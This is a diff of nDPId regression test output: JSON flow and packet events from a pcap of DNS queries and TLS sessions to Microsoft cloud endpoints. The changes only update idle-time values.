00554{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1626168077441,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"thread_ts_msec":1626168077441,"pkt":"WNVuaKQA8BiYFWV8CABFAABlf9gAAEARKH\/AqAF5CAgICP\/UADUAUcNfVk0BAAABAAAAAAAAGHdkLXByb2QtY3AtZXUtbm9ydGgtMi1mZQtub3J0aGV1cm9wZQhjbG91ZGFwcAVhenVyZQNjb20AAEEAAQ=="} 00825{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077441,"flow_last_seen":1626168077441,"flow_idle_time":180000,"flow_min_l4_payload_len":73,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1626168077441,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65492,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"},"dns": 
{"query":"wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":65,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077469,"flow_last_seen":1626168077469,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168077469,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53910,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1626168077469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168077469,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KWAbtjvPcwAAAAALAC\/\/\/cwgAAAgQFtAEDAwYBAQgKPdH4ZwAAAAAEAgAA"} +00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077469,"flow_last_seen":1626168077469,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168077469,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53910,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1626168077469,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168077469,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KWAbtjvPcwAAAAALAC\/\/\/cwgAAAgQFtAEDAwYBAQgKPdH4ZwAAAAAEAgAA"} 00732{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1626168077486,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":1626168077486,"pkt":"8BiYFWV8WNVuaKQACABFAADs3EYAAHkRkokICAgIwKgBeQA12Q8A2KuGXeWBgAABAAIAAQAABHdkY3AJbWljcm9zb2Z0A2NvbQAAQQABwAwABQABAAAN4AAfCndkLXByb2QtY3AOdHJhZmZpY21hbmFnZXIDbmV0AMAwAAUAAQAAAG0ANhh3ZC1wcm9kLWNwLWV1LW5vcnRoLTEtZmULbm9ydGhldXJvcGUIY2xvdWRhcHAFYXp1cmXAG8B0AAYAAQAAADsAMwRwcmQxDmF6dXJlZG5zLWNsb3VkwEoGbXNuaHN0wBEAACcRAAADhAAAASwACTqAAAAAPA=="} 00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077413,"flow_last_seen":1626168077486,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":244,"flow_avg_l4_payload_len":122,"midstream":0,"thread_ts_msec":1626168077486,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55567,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": 
{"query":"wdcp.microsoft.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":65,"rsp_type":5,"rsp_addr":"0.0.0.0"}} -00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077506,"flow_last_seen":1626168077506,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168077506,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53911,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1626168077506,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168077506,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KXAbtENsV0AAAAALAC\/\/8t3wAAAgQFtAEDAwYBAQgKPdH4jAAAAAAEAgAA"} +00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077506,"flow_last_seen":1626168077506,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168077506,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53911,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1626168077506,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168077506,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KXAbtENsV0AAAAALAC\/\/8t3wAAAgQFtAEDAwYBAQgKPdH4jAAAAAAEAgAA"} 00654{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1626168077507,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"thread_ts_msec":1626168077507,"pkt":"8BiYFWV8WNVuaKQACABFAACx7P0AAHkRgg0ICAgIwKgBeQA1\/9QAnZiFVk2BgAABAAAAAQAAGHdkLXByb2QtY3AtZXUtbm9ydGgtMi1mZQtub3J0aGV1cm9wZQhjbG91ZGFwcAVhenVyZQNjb20AAEEAAcAlAAYAAQAAADsAQARwcmQxDmF6dXJlZG5zLWNsb3VkA25ldAAGbXNuaHN0CW1pY3Jvc29mdMBAAAAnEQAAA4QAAAEsAAk6gAAAADw="} 00836{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":46,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077441,"flow_last_seen":1626168077507,"flow_idle_time":180000,"flow_min_l4_payload_len":73,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1626168077507,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65492,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"},"dns": 
{"query":"wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":65,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1626168077517,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168077517,"pkt":"8BiYFWV8WNVuaKQACABFAAA0QHFAAG0G2JEocQovwKgBeQG70pbavX69Y7z3MYAS\/\/\/xlwAAAgQFoAEDAwgBAQQC"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1626168077517,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168077517,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KWAbtjvPcx2r1+vlAQEAAiVwAA"} -00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077469,"flow_last_seen":1626168077517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168077517,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53910,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1626168077557,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168077557,"pkt":"8BiYFWV8WNVuaKQACABFAAA0ihJAAG0GjvAocQovwKgBeQG70pd9bt1TRDbFdYAS\/\/9BkgAAAgQFoAEDAwgBAQQC"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1626168077557,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168077557,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KXAbtENsV1fW7dVFAQEAByUQAA"} -00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077506,"flow_last_seen":1626168077557,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168077557,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53911,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01413{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":55,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168077469,"flow_last_seen":1626168077565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168077565,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53910,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1626168077517,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168077517,"pkt":"8BiYFWV8WNVuaKQACABFAAA0QHFAAG0G2JEocQovwKgBeQG70pbavX69Y7z3MYAS\/\/\/xlwAAAgQFoAEDAwgBAQQC"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1626168077517,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168077517,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KWAbtjvPcx2r1+vlAQEAAiVwAA"} +00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077469,"flow_last_seen":1626168077517,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168077517,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53910,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1626168077557,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168077557,"pkt":"8BiYFWV8WNVuaKQACABFAAA0ihJAAG0GjvAocQovwKgBeQG70pd9bt1TRDbFdYAS\/\/9BkgAAAgQFoAEDAwgBAQQC"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1626168077557,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168077557,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KXAbtENsV1fW7dVFAQEAByUQAA"} +00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077506,"flow_last_seen":1626168077557,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168077557,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53911,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01413{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":55,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168077469,"flow_last_seen":1626168077565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168077565,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53910,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} 
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077590,"flow_last_seen":1626168077590,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1626168077590,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51364,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1626168077590,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1626168077590,"pkt":"WNVuaKQA8BiYFWV8CABFAAA\/efAAAEARLo3AqAF5CAgICMikADUAK6rjycUBAAABAAAAAAAAA3d3dwltaWNyb3NvZnQDY29tAABBAAE="} 00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077590,"flow_last_seen":1626168077590,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1626168077590,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51364,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"www.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":65,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
@@ -73,27 +73,27 @@ 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":62,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077604,"flow_last_seen":1626168077604,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1626168077604,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":54561,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1626168077604,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1626168077604,"pkt":"WNVuaKQA8BiYFWV8CABFAABIJH8AAEARg\/XAqAF5CAgICNUhADUANLCIQG8BAAABAAAAAAAABmUxMzY3OARkc2NiCmFrYW1haWVkZ2UDbmV0AAABAAE="} 00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077604,"flow_last_seen":1626168077604,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1626168077604,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":54561,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"e13678.dscb.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-01413{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":65,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168077506,"flow_last_seen":1626168077607,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168077607,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53911,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} 
+01413{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":65,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168077506,"flow_last_seen":1626168077607,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168077607,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53911,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 